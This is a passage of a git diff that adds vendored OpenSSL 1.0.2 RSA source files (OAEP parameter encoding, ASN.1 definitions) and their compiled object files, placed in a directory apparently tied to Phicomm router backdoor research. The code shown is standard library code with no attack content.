+    EVP_PKEY_CTX *pkctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    int pad_mode = RSA_PKCS1_PADDING, rv = 0, labellen;
+    unsigned char *label;
+    CMS_RecipientInfo_ktri_get0_algs(ri, NULL, NULL, &alg);
+    if (pkctx) {
+        if (EVP_PKEY_CTX_get_rsa_padding(pkctx, &pad_mode) <= 0)
+            return 0;
+    }
+    if (pad_mode == RSA_PKCS1_PADDING) {
+        X509_ALGOR_set0(alg, OBJ_nid2obj(NID_rsaEncryption), V_ASN1_NULL, 0);
+        return 1;
+    }
+    /* Not supported */
+    if (pad_mode != RSA_PKCS1_OAEP_PADDING)
+        return 0;
+    if (EVP_PKEY_CTX_get_rsa_oaep_md(pkctx, &md) <= 0)
+        goto err;
+    if (EVP_PKEY_CTX_get_rsa_mgf1_md(pkctx, &mgf1md) <= 0)
+        goto err;
+    labellen = EVP_PKEY_CTX_get0_rsa_oaep_label(pkctx, &label);
+    if (labellen < 0)
+        goto err;
+    oaep = RSA_OAEP_PARAMS_new();
+    if (!oaep)
+        goto err;
+    if (!rsa_md_to_algor(&oaep->hashFunc, md))
+        goto err;
+    if (!rsa_md_to_mgf1(&oaep->maskGenFunc, mgf1md))
+        goto err;
+    if (labellen > 0) {
+        ASN1_OCTET_STRING *los = ASN1_OCTET_STRING_new();
+        oaep->pSourceFunc = X509_ALGOR_new();
+        if (!oaep->pSourceFunc)
+            goto err;
+        if (!los)
+            goto err;
+        if (!ASN1_OCTET_STRING_set(los, label, labellen)) {
+            ASN1_OCTET_STRING_free(los);
+            goto err;
+        }
+        X509_ALGOR_set0(oaep->pSourceFunc, OBJ_nid2obj(NID_pSpecified),
+                        V_ASN1_OCTET_STRING, los);
+    }
+    /* create string with pss parameter encoding. */
+    if (!ASN1_item_pack(oaep, ASN1_ITEM_rptr(RSA_OAEP_PARAMS), &os))
+         goto err;
+    X509_ALGOR_set0(alg, OBJ_nid2obj(NID_rsaesOaep), V_ASN1_SEQUENCE, os);
+    os = NULL;
+    rv = 1;
+ err:
+    if (oaep)
+        RSA_OAEP_PARAMS_free(oaep);
+    if (os)
+        ASN1_STRING_free(os);
+    return rv;
+}
+
+const EVP_PKEY_ASN1_METHOD rsa_asn1_meths[] = {
+    {
+     EVP_PKEY_RSA,
+     EVP_PKEY_RSA,
+     ASN1_PKEY_SIGPARAM_NULL,
+
+     "RSA",
+     "OpenSSL RSA method",
+
+     rsa_pub_decode,
+     rsa_pub_encode,
+     rsa_pub_cmp,
+     rsa_pub_print,
+
+     rsa_priv_decode,
+     rsa_priv_encode,
+     rsa_priv_print,
+
+     int_rsa_size,
+     rsa_bits,
+
+     0, 0, 0, 0, 0, 0,
+
+     rsa_sig_print,
+     int_rsa_free,
+     rsa_pkey_ctrl,
+     old_rsa_priv_decode,
+     old_rsa_priv_encode,
+     rsa_item_verify,
+     rsa_item_sign},
+
+    {
+     EVP_PKEY_RSA2,
+     EVP_PKEY_RSA,
+     ASN1_PKEY_ALIAS}
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ameth.o
new file mode 100644
index 0000000000000000000000000000000000000000..75d0fc85449fc260feacff60bdc2d85c27b1aee9
GIT binary patch
literal 20928
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.c
new file mode 100644
index 0000000..aff8b58
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.c
@@ -0,0 +1,131 @@
+/* rsa_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/x509.h>
+#include <openssl/asn1t.h>
+
+/* Override the default free and new methods */
+static int rsa_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    if (operation == ASN1_OP_NEW_PRE) {
+        *pval = (ASN1_VALUE *)RSA_new();
+        if (*pval)
+            return 2;
+        return 0;
+    } else if (operation == ASN1_OP_FREE_PRE) {
+        RSA_free((RSA *)*pval);
+        *pval = NULL;
+        return 2;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(RSAPrivateKey, rsa_cb) = {
+        ASN1_SIMPLE(RSA, version, LONG),
+        ASN1_SIMPLE(RSA, n, BIGNUM),
+        ASN1_SIMPLE(RSA, e, BIGNUM),
+        ASN1_SIMPLE(RSA, d, BIGNUM),
+        ASN1_SIMPLE(RSA, p, BIGNUM),
+        ASN1_SIMPLE(RSA, q, BIGNUM),
+        ASN1_SIMPLE(RSA, dmp1, BIGNUM),
+        ASN1_SIMPLE(RSA, dmq1, BIGNUM),
+        ASN1_SIMPLE(RSA, iqmp, BIGNUM)
+} ASN1_SEQUENCE_END_cb(RSA, RSAPrivateKey)
+
+
+ASN1_SEQUENCE_cb(RSAPublicKey, rsa_cb) = {
+        ASN1_SIMPLE(RSA, n, BIGNUM),
+        ASN1_SIMPLE(RSA, e, BIGNUM),
+} ASN1_SEQUENCE_END_cb(RSA, RSAPublicKey)
+
+ASN1_SEQUENCE(RSA_PSS_PARAMS) = {
+        ASN1_EXP_OPT(RSA_PSS_PARAMS, hashAlgorithm, X509_ALGOR,0),
+        ASN1_EXP_OPT(RSA_PSS_PARAMS, maskGenAlgorithm, X509_ALGOR,1),
+        ASN1_EXP_OPT(RSA_PSS_PARAMS, saltLength, ASN1_INTEGER,2),
+        ASN1_EXP_OPT(RSA_PSS_PARAMS, trailerField, ASN1_INTEGER,3)
+} ASN1_SEQUENCE_END(RSA_PSS_PARAMS)
+
+IMPLEMENT_ASN1_FUNCTIONS(RSA_PSS_PARAMS)
+
+ASN1_SEQUENCE(RSA_OAEP_PARAMS) = {
+        ASN1_EXP_OPT(RSA_OAEP_PARAMS, hashFunc, X509_ALGOR, 0),
+        ASN1_EXP_OPT(RSA_OAEP_PARAMS, maskGenFunc, X509_ALGOR, 1),
+        ASN1_EXP_OPT(RSA_OAEP_PARAMS, pSourceFunc, X509_ALGOR, 2),
+} ASN1_SEQUENCE_END(RSA_OAEP_PARAMS)
+
+IMPLEMENT_ASN1_FUNCTIONS(RSA_OAEP_PARAMS)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(RSA, RSAPrivateKey, RSAPrivateKey)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(RSA, RSAPublicKey, RSAPublicKey)
+
+RSA *RSAPublicKey_dup(RSA *rsa)
+{
+    return ASN1_item_dup(ASN1_ITEM_rptr(RSAPublicKey), rsa);
+}
+
+RSA *RSAPrivateKey_dup(RSA *rsa)
+{
+    return ASN1_item_dup(ASN1_ITEM_rptr(RSAPrivateKey), rsa);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..de60dee453b6561d9020f2b7bc25adb777ee5366
GIT binary patch
literal 7456
zcmcJTU5ryz5XaAM1y+TnpyCPy?*l5R)OM8!MoA0%Q9{{W>5^;|Q@Y(Nt@dMSZ(%`{
zO%P=RB=`{}%ELxuLJWx{yzs!o8WQD!2ckakzypcKVDv#lOwbT<=60r?&fY6V;UwER
z^E>}DbMD-8drx<7ccQ1YrNwY-F>6f2V`|J~N24EgyHPXW%rjT#F8MPy7@N4Bj89yB
ze*cZ?f-5*0-#-<f2%K((Zr9xI%RevPccZmBFMe=MZS?B^ihiCMJA=8pCN975Vr<J<
zj1@mT2Zw&bkD7m<@}E=wO6A|~`8SC_@mKt?T4FQWl#HeNW8DL(f!L<l#-z!nE7_iE
zF=Gnp%B#J0(d~~WOVx75cKbMCAeof<SbkfnoO7}Tp40%9blyqW#cfX3IOTLMZ<l*=
zc7DV_6jL;|*<qI}xl+-Lm{GIcj1)#A@UcB&a@z}|SV`4*F9a2LZ=hgedkAXkdr8l~
zqe*3qrF?e%^5f2u?YMMqVc#$Rohrxe%Kwha<L9!D*W2bJWF6N}-xocN^_pv+b+;-%
